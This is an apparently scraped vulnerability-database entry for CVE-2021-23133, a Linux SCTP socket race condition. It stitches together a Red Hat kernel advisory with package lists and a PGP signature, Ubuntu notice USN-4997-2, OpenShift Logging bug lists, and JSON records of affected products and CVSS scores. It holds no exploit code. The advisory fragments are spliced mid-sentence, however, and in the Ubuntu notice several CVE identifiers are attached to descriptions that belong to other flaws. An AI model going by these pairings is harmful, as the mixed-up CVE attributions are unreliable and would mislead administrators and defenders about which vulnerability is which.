ppc64le: bpftool-4.18.0-348.el8.ppc64le.rpm bpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-4.18.0-348.el8.ppc64le.rpm kernel-core-4.18.0-348.el8.ppc64le.rpm kernel-cross-headers-4.18.0-348.el8.ppc64le.rpm kernel-debug-4.18.0-348.el8.ppc64le.rpm kernel-debug-core-4.18.0-348.el8.ppc64le.rpm kernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debug-devel-4.18.0-348.el8.ppc64le.rpm kernel-debug-modules-4.18.0-348.el8.ppc64le.rpm kernel-debug-modules-extra-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm kernel-devel-4.18.0-348.el8.ppc64le.rpm kernel-headers-4.18.0-348.el8.ppc64le.rpm kernel-modules-4.18.0-348.el8.ppc64le.rpm kernel-modules-extra-4.18.0-348.el8.ppc64le.rpm kernel-tools-4.18.0-348.el8.ppc64le.rpm kernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-tools-libs-4.18.0-348.el8.ppc64le.rpm perf-4.18.0-348.el8.ppc64le.rpm perf-debuginfo-4.18.0-348.el8.ppc64le.rpm python3-perf-4.18.0-348.el8.ppc64le.rpm python3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm
s390x: bpftool-4.18.0-348.el8.s390x.rpm bpftool-debuginfo-4.18.0-348.el8.s390x.rpm kernel-4.18.0-348.el8.s390x.rpm kernel-core-4.18.0-348.el8.s390x.rpm kernel-cross-headers-4.18.0-348.el8.s390x.rpm kernel-debug-4.18.0-348.el8.s390x.rpm kernel-debug-core-4.18.0-348.el8.s390x.rpm kernel-debug-debuginfo-4.18.0-348.el8.s390x.rpm kernel-debug-devel-4.18.0-348.el8.s390x.rpm kernel-debug-modules-4.18.0-348.el8.s390x.rpm kernel-debug-modules-extra-4.18.0-348.el8.s390x.rpm kernel-debuginfo-4.18.0-348.el8.s390x.rpm kernel-debuginfo-common-s390x-4.18.0-348.el8.s390x.rpm kernel-devel-4.18.0-348.el8.s390x.rpm kernel-headers-4.18.0-348.el8.s390x.rpm kernel-modules-4.18.0-348.el8.s390x.rpm kernel-modules-extra-4.18.0-348.el8.s390x.rpm kernel-tools-4.18.0-348.el8.s390x.rpm kernel-tools-debuginfo-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-core-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-debuginfo-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-devel-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-modules-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-modules-extra-4.18.0-348.el8.s390x.rpm perf-4.18.0-348.el8.s390x.rpm perf-debuginfo-4.18.0-348.el8.s390x.rpm python3-perf-4.18.0-348.el8.s390x.rpm python3-perf-debuginfo-4.18.0-348.el8.s390x.rpm
x86_64: bpftool-4.18.0-348.el8.x86_64.rpm bpftool-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-4.18.0-348.el8.x86_64.rpm kernel-core-4.18.0-348.el8.x86_64.rpm kernel-cross-headers-4.18.0-348.el8.x86_64.rpm kernel-debug-4.18.0-348.el8.x86_64.rpm kernel-debug-core-4.18.0-348.el8.x86_64.rpm kernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debug-devel-4.18.0-348.el8.x86_64.rpm kernel-debug-modules-4.18.0-348.el8.x86_64.rpm kernel-debug-modules-extra-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm kernel-devel-4.18.0-348.el8.x86_64.rpm kernel-headers-4.18.0-348.el8.x86_64.rpm kernel-modules-4.18.0-348.el8.x86_64.rpm kernel-modules-extra-4.18.0-348.el8.x86_64.rpm kernel-tools-4.18.0-348.el8.x86_64.rpm kernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-tools-libs-4.18.0-348.el8.x86_64.rpm perf-4.18.0-348.el8.x86_64.rpm perf-debuginfo-4.18.0-348.el8.x86_64.rpm python3-perf-4.18.0-348.el8.x86_64.rpm python3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm
Red Hat Enterprise Linux CRB (v. 8):
aarch64: bpftool-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm kernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-tools-libs-devel-4.18.0-348.el8.aarch64.rpm perf-debuginfo-4.18.0-348.el8.aarch64.rpm python3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm
ppc64le: bpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm kernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-tools-libs-devel-4.18.0-348.el8.ppc64le.rpm perf-debuginfo-4.18.0-348.el8.ppc64le.rpm python3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm
x86_64: bpftool-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm kernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-tools-libs-devel-4.18.0-348.el8.x86_64.rpm perf-debuginfo-4.18.0-348.el8.x86_64.rpm python3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYYrdRdzjgjWX9erEAQhs0w//as9X4T+FCf3TAbcNIStxlOK6fbJoAlST FrgNJnRH3RmT+VxRSLWZcsJQf78kudeJWtMezbGSVREfhCMBCGhKZ7mvVp5P7J8l bobmdaap3hqkPqq66VuKxGuS+6j0rXXgGQH034yzoX+L/lx6KV9qdAnZZO+7kWcy SfX0GkLg0ARDMfsoUKwVmeUeNLhPlJ4ZH2rBdZ4FhjyEAG/5yL9JwU/VNReWHjhW HgarTuSnFR3vLQDKyjMIEEiBPOI162hS2j3Ba/A/1hJ70HOjloJnd0eWYGxSuIfC DRrzlacFNAzBPZsbRFi1plXrHh5LtNoBBWjl+xyb6jRsB8eXgS+WhzUhOXGUv01E lJTwFy5Kz71d+cAhRXgmz5gVgWuoNJw8AEImefWcy4n0EEK55vdFe0Sl7BfZiwpD Jhx97He6OurNnLrYyJJ0+TsU1L33794Ag2AJZnN1PLFUyrKKNlD1ZWtdsJg99klK dQteUTnnUhgDG5Tqulf0wX19BEkLd/O6CRyGueJcV4h4PFpSoWOh5Yy/BlokFzc8 zf14PjuVueIodaIUXtK+70Zmw7tg09Dx5Asyfuk5hWFPYv856nHlDn7PT724CU8v 1cp96h1IjLR6cF17NO2JCcbU0XZEW+aCkGkPcsY8DhBmaZqxUxXObvTD80Mm7EvN +PuV5cms0sE=2UUA -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . ========================================================================== Ubuntu Security Notice USN-4997-2 June 25, 2021
linux-kvm vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 21.04
Summary:
Several security issues were fixed in the Linux kernel.
Software Description: - linux-kvm: Linux kernel for cloud environments
Details:
USN-4997-1 fixed vulnerabilities in the Linux kernel for Ubuntu 21.04. This update provides the corresponding updates for the Linux KVM kernel for Ubuntu 21.04. A local attacker could use this issue to execute arbitrary code. (CVE-2021-3609)
Piotr Krysiuk discovered that the eBPF implementation in the Linux kernel did not properly enforce limits for pointer operations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33200)
Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation did not properly clear received fragments from memory in some situations. A physically proximate attacker could possibly use this issue to inject packets or expose sensitive information. (CVE-2020-24586)
Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled encrypted fragments. A physically proximate attacker could possibly use this issue to decrypt fragments. (CVE-2020-24587)
Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled certain malformed frames. If a user were tricked into connecting to a malicious server, a physically proximate attacker could use this issue to inject packets. (CVE-2020-24588)
Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled EAPOL frames from unauthenticated senders. A physically proximate attacker could inject malicious packets to cause a denial of service (system crash). (CVE-2020-26139)
Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation did not properly verify certain fragmented frames. A physically proximate attacker could possibly use this issue to inject or decrypt packets. (CVE-2020-26141)
Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation accepted plaintext fragments in certain situations. A physically proximate attacker could use this issue to inject packets. (CVE-2020-26145)
Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation could reassemble mixed encrypted and plaintext fragments. A physically proximate attacker could possibly use this issue to inject packets or exfiltrate selected fragments. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-23133)
Or Cohen and Nadav Markus discovered a use-after-free vulnerability in the nfc implementation in the Linux kernel. A privileged local attacker could use this issue to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-23134)
Manfred Paul discovered that the extended Berkeley Packet Filter (eBPF) implementation in the Linux kernel contained an out-of-bounds vulnerability. A local attacker could use this issue to execute arbitrary code. (CVE-2021-31440)
Piotr Krysiuk discovered that the eBPF implementation in the Linux kernel did not properly prevent speculative loads in certain situations. A local attacker could use this to expose sensitive information (kernel memory). An attacker could use this issue to possibly execute arbitrary code. (CVE-2021-32399)
It was discovered that a use-after-free existed in the Bluetooth HCI driver of the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33034)
It was discovered that an out-of-bounds (OOB) memory access flaw existed in the f2fs module of the Linux kernel. A local attacker could use this issue to cause a denial of service (system crash). (CVE-2021-3506)
Mathias Krause discovered that a null pointer dereference existed in the Nitro Enclaves kernel driver of the Linux kernel. A local attacker could use this issue to cause a denial of service or possibly execute arbitrary code. (CVE-2021-3543)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 21.04: linux-image-5.11.0-1009-kvm 5.11.0-1009.9 linux-image-kvm 5.11.0.1009.9
After a standard system update you need to reboot your computer to make all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.
References: https://ubuntu.com/security/notices/USN-4997-2 https://ubuntu.com/security/notices/USN-4997-1 CVE-2020-24586, CVE-2020-24587, CVE-2020-24588, CVE-2020-26139, CVE-2020-26141, CVE-2020-26145, CVE-2020-26147, CVE-2021-23133, CVE-2021-23134, CVE-2021-31440, CVE-2021-31829, CVE-2021-32399, CVE-2021-33034, CVE-2021-33200, CVE-2021-3506, CVE-2021-3543, CVE-2021-3609
Package Information: https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1009.9
. Solution:
For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:
https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html
For Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:
https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html
- Bugs fixed (https://bugzilla.redhat.com/):
1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment
- JIRA issues fixed (https://issues.jboss.org/):
LOG-1168 - Disable hostname verification in syslog TLS settings
LOG-1235 - Using HTTPS without a secret does not translate into the correct 'scheme' value in Fluentd
LOG-1375 - ssl_ca_cert should be optional
LOG-1378 - CLO should support sasl_plaintext(Password over http)
LOG-1392 - In fluentd config, flush_interval can't be set with flush_mode=immediate
LOG-1494 - Syslog output is serializing json incorrectly
LOG-1555 - Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server
LOG-1575 - Rejected by Elasticsearch and unexpected json-parsing
LOG-1735 - Regression introducing flush_at_shutdown
LOG-1774 - The collector logs should be excluded in fluent.conf
LOG-1776 - fluentd total_limit_size sets value beyond available space
LOG-1822 - OpenShift Alerting Rules Style-Guide Compliance
LOG-1859 - CLO Should not error and exit early on missing ca-bundle when cluster wide proxy is not enabled
LOG-1862 - Unsupported kafka parameters when enabled Kafka SASL
LOG-1903 - Fix the Display of ClusterLogging type in OLM
LOG-1911 - CLF API changes to Opt-in to multiline error detection
LOG-1918 - Alert FluentdNodeDown always firing
LOG-1939 - Opt-in multiline detection breaks cloudwatch forwarding
6
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "5.5"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "33"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.15"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.4.114"
},
{
"_id": null,
"model": "solidfire \\\u0026 hci management node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.14.232"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.10"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.10.32"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.19.189"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "34"
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "solidfire baseboard management controller",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.11.16"
},
{
"_id": null,
"model": "brocade fabric operating system",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "5.11"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "32"
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.20"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-23133"
}
]
},
"credits": {
"_id": null,
"data": "Ubuntu",
"sources": [
{
"db": "PACKETSTORM",
"id": "163249"
},
{
"db": "PACKETSTORM",
"id": "163251"
},
{
"db": "PACKETSTORM",
"id": "163253"
},
{
"db": "PACKETSTORM",
"id": "163255"
},
{
"db": "PACKETSTORM",
"id": "163262"
},
{
"db": "PACKETSTORM",
"id": "163291"
},
{
"db": "PACKETSTORM",
"id": "163301"
}
],
"trust": 0.7
},
"cve": "CVE-2021-23133",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 6.9,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.4,
"id": "CVE-2021-23133",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.0,
"id": "CVE-2021-23133",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "psirt@paloaltonetworks.com",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.8,
"id": "CVE-2021-23133",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-23133",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "psirt@paloaltonetworks.com",
"id": "CVE-2021-23133",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202104-1348",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2021-23133",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-23133"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1348"
},
{
"db": "NVD",
"id": "CVE-2021-23133"
},
{
"db": "NVD",
"id": "CVE-2021-23133"
}
]
},
"description": {
"_id": null,
"data": "A race condition in Linux kernel SCTP sockets (net/sctp/socket.c) before 5.12-rc8 can lead to kernel privilege escalation from the context of a network service or an unprivileged process. If sctp_destroy_sock is called without sock_net(sk)-\u003esctp.addr_wq_lock then an element is removed from the auto_asconf_splist list without any proper locking. This can be exploited by an attacker with network service privileges to escalate to root or from the context of an unprivileged user directly if a BPF_CGROUP_INET_SOCK_CREATE is attached which denies creation of some SCTP socket. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nSecurity Fix(es):\n* kernel: out-of-bounds reads in pinctrl subsystem. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: kernel security, bug fix, and enhancement update\nAdvisory ID: RHSA-2021:4356-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2021:4356\nIssue date: 2021-11-09\nCVE Names: CVE-2020-0427 CVE-2020-24502 CVE-2020-24503\n CVE-2020-24504 CVE-2020-24586 CVE-2020-24587\n CVE-2020-24588 CVE-2020-26139 CVE-2020-26140\n CVE-2020-26141 CVE-2020-26143 CVE-2020-26144\n CVE-2020-26145 CVE-2020-26146 CVE-2020-26147\n CVE-2020-27777 CVE-2020-29368 CVE-2020-29660\n CVE-2020-36158 CVE-2020-36386 CVE-2021-0129\n CVE-2021-3348 CVE-2021-3489 CVE-2021-3564\n CVE-2021-3573 CVE-2021-3600 CVE-2021-3635\n CVE-2021-3659 CVE-2021-3679 CVE-2021-3732\n CVE-2021-20194 CVE-2021-20239 CVE-2021-23133\n CVE-2021-28950 CVE-2021-28971 CVE-2021-29155\n CVE-2021-29646 CVE-2021-29650 CVE-2021-31440\n CVE-2021-31829 CVE-2021-31916 CVE-2021-33200\n====================================================================\n1. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, x86_64\n\n3. \n\nSecurity Fix(es):\n* kernel: out-of-bounds reads in pinctrl subsystem (CVE-2020-0427)\n* kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter\ndrivers (CVE-2020-24502)\n* kernel: Insufficient access control in some Intel(R) Ethernet E810\nAdapter drivers (CVE-2020-24503)\n* kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810\nAdapter drivers (CVE-2020-24504)\n* kernel: Fragmentation cache not cleared on reconnection (CVE-2020-24586)\n* kernel: Reassembling fragments encrypted under different keys\n(CVE-2020-24587)\n* kernel: wifi frame payload being parsed incorrectly as an L2 frame\n(CVE-2020-24588)\n* kernel: Forwarding EAPOL from unauthenticated wifi client\n(CVE-2020-26139)\n* kernel: accepting plaintext data frames in protected networks\n(CVE-2020-26140)\n* kernel: not verifying TKIP MIC of fragmented frames (CVE-2020-26141)\n* kernel: accepting fragmented plaintext frames in protected networks\n(CVE-2020-26143)\n* kernel: accepting unencrypted A-MSDU frames that start with RFC1042\nheader (CVE-2020-26144)\n* kernel: accepting plaintext broadcast fragments as full frames\n(CVE-2020-26145)\n* kernel: powerpc: RTAS calls can be used to compromise kernel integrity\n(CVE-2020-27777)\n* kernel: locking inconsistency in tty_io.c and tty_jobctrl.c can lead to a\nread-after-free (CVE-2020-29660)\n* kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function via a\nlong SSID value (CVE-2020-36158)\n* kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt()\n(CVE-2020-36386)\n* kernel: Improper access control in BlueZ may allow information disclosure\nvulnerability. (CVE-2021-0129)\n* kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c\n(CVE-2021-3348)\n* kernel: Linux kernel eBPF RINGBUF map oversized allocation\n(CVE-2021-3489)\n* kernel: double free in bluetooth subsystem when the HCI device\ninitialization fails (CVE-2021-3564)\n* kernel: use-after-free in function hci_sock_bound_ioctl() (CVE-2021-3573)\n* kernel: eBPF 32-bit source register truncation on div/mod (CVE-2021-3600)\n* kernel: DoS in rb_per_cpu_empty() (CVE-2021-3679)\n* kernel: Mounting overlayfs inside an unprivileged user namespace can\nreveal files (CVE-2021-3732)\n* kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt()\n(CVE-2021-20194)\n* kernel: Race condition in sctp_destroy_sock list_del (CVE-2021-23133)\n* kernel: fuse: stall on CPU can occur because a retry loop continually\nfinds the same bad inode (CVE-2021-28950)\n* kernel: System crash in intel_pmu_drain_pebs_nhm in\narch/x86/events/intel/ds.c (CVE-2021-28971)\n* kernel: protection can be bypassed to leak content of kernel memory\n(CVE-2021-29155)\n* kernel: improper input validation in tipc_nl_retrieve_key function in\nnet/tipc/node.c (CVE-2021-29646)\n* kernel: lack a full memory barrier may lead to DoS (CVE-2021-29650)\n* kernel: local escalation of privileges in handling of eBPF programs\n(CVE-2021-31440)\n* kernel: protection of stack pointer against speculative pointer\narithmetic can be bypassed to leak content of kernel memory\n(CVE-2021-31829)\n* kernel: out-of-bounds reads and writes due to enforcing incorrect limits\nfor pointer arithmetic operations by BPF verifier (CVE-2021-33200)\n* kernel: reassembling encrypted fragments with non-consecutive packet\nnumbers (CVE-2020-26146)\n* kernel: reassembling mixed encrypted/plaintext fragments (CVE-2020-26147)\n* kernel: the copy-on-write implementation can grant unintended write\naccess because of a race condition in a THP mapcount check (CVE-2020-29368)\n* kernel: flowtable list del corruption with kernel BUG at\nlib/list_debug.c:50 (CVE-2021-3635)\n* kernel: NULL pointer dereference in llsec_key_alloc() in\nnet/mac802154/llsec.c (CVE-2021-3659)\n* kernel: setsockopt System Call Untrusted Pointer Dereference Information\nDisclosure (CVE-2021-20239)\n* kernel: out of bounds array access in drivers/md/dm-ioctl.c\n(CVE-2021-31916)\n\n4. Solution:\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.5 Release Notes linked from the References section. \n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1509204 - dlm: Add ability to set SO_MARK on DLM sockets\n1793880 - Unreliable RTC synchronization (11-minute mode)\n1816493 - [RHEL 8.3] Discard request from mkfs.xfs takes too much time on raid10\n1900844 - CVE-2020-27777 kernel: powerpc: RTAS calls can be used to compromise kernel integrity\n1903244 - CVE-2020-29368 kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check\n1906522 - CVE-2020-29660 kernel: locking inconsistency in drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c can lead to a read-after-free\n1912683 - CVE-2021-20194 kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt()\n1913348 - CVE-2020-36158 kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function in drivers/net/wireless/marvell/mwifiex/join.c via a long SSID value\n1915825 - Allow falling back to genfscon labeling when the FS doesn\u0027t support xattrs and there is a fs_use_xattr rule for it\n1919893 - CVE-2020-0427 kernel: out-of-bounds reads in pinctrl subsystem. \n1921958 - CVE-2021-3348 kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c\n1923636 - CVE-2021-20239 kernel: setsockopt System Call Untrusted Pointer Dereference Information Disclosure\n1930376 - CVE-2020-24504 kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810 Adapter drivers\n1930379 - CVE-2020-24502 kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter drivers\n1930381 - CVE-2020-24503 kernel: Insufficient access control in some Intel(R) Ethernet E810 Adapter drivers\n1933527 - Files on cifs mount can get mixed contents when underlying file is removed but inode number is reused, when mounted with \u0027serverino\u0027 and \u0027cache=strict \u0027\n1939341 - CNB: net: add inline function skb_csum_is_sctp\n1941762 - CVE-2021-28950 kernel: fuse: stall on CPU can occur because a retry loop continually finds the same bad inode\n1941784 - CVE-2021-28971 kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c\n1945345 - CVE-2021-29646 kernel: improper input validation in tipc_nl_retrieve_key function in net/tipc/node.c\n1945388 - CVE-2021-29650 kernel: lack a full memory barrier upon the assignment of a new table value in net/netfilter/x_tables.c and include/linux/netfilter/x_tables.h may lead to DoS\n1946965 - CVE-2021-31916 kernel: out of bounds array access in drivers/md/dm-ioctl.c\n1948772 - CVE-2021-23133 kernel: Race condition in sctp_destroy_sock list_del\n1951595 - CVE-2021-29155 kernel: protection for sequences of pointer arithmetic operations against speculatively out-of-bounds loads can be bypassed to leak content of kernel memory\n1953847 - [ethtool] The `NLM_F_MULTI` should be used for `NLM_F_DUMP`\n1954588 - RHEL kernel 8.2 and higher are affected by data corruption bug in raid1 arrays using bitmaps. \n1957788 - CVE-2021-31829 kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory\n1959559 - CVE-2021-3489 kernel: Linux kernel eBPF RINGBUF map oversized allocation\n1959642 - CVE-2020-24586 kernel: Fragmentation cache not cleared on reconnection\n1959654 - CVE-2020-24587 kernel: Reassembling fragments encrypted under different keys\n1959657 - CVE-2020-24588 kernel: wifi frame payload being parsed incorrectly as an L2 frame\n1959663 - CVE-2020-26139 kernel: Forwarding EAPOL from unauthenticated wifi client\n1960490 - CVE-2020-26140 kernel: accepting plaintext data frames in protected networks\n1960492 - CVE-2020-26141 kernel: not verifying TKIP MIC of fragmented frames\n1960496 - CVE-2020-26143 kernel: accepting fragmented plaintext frames in protected networks\n1960498 - CVE-2020-26144 kernel: accepting unencrypted A-MSDU frames that start with RFC1042 header\n1960500 - CVE-2020-26145 kernel: accepting plaintext broadcast fragments as full frames\n1960502 - CVE-2020-26146 kernel: reassembling encrypted fragments with non-consecutive packet numbers\n1960504 - CVE-2020-26147 kernel: reassembling mixed encrypted/plaintext fragments\n1960708 - please add 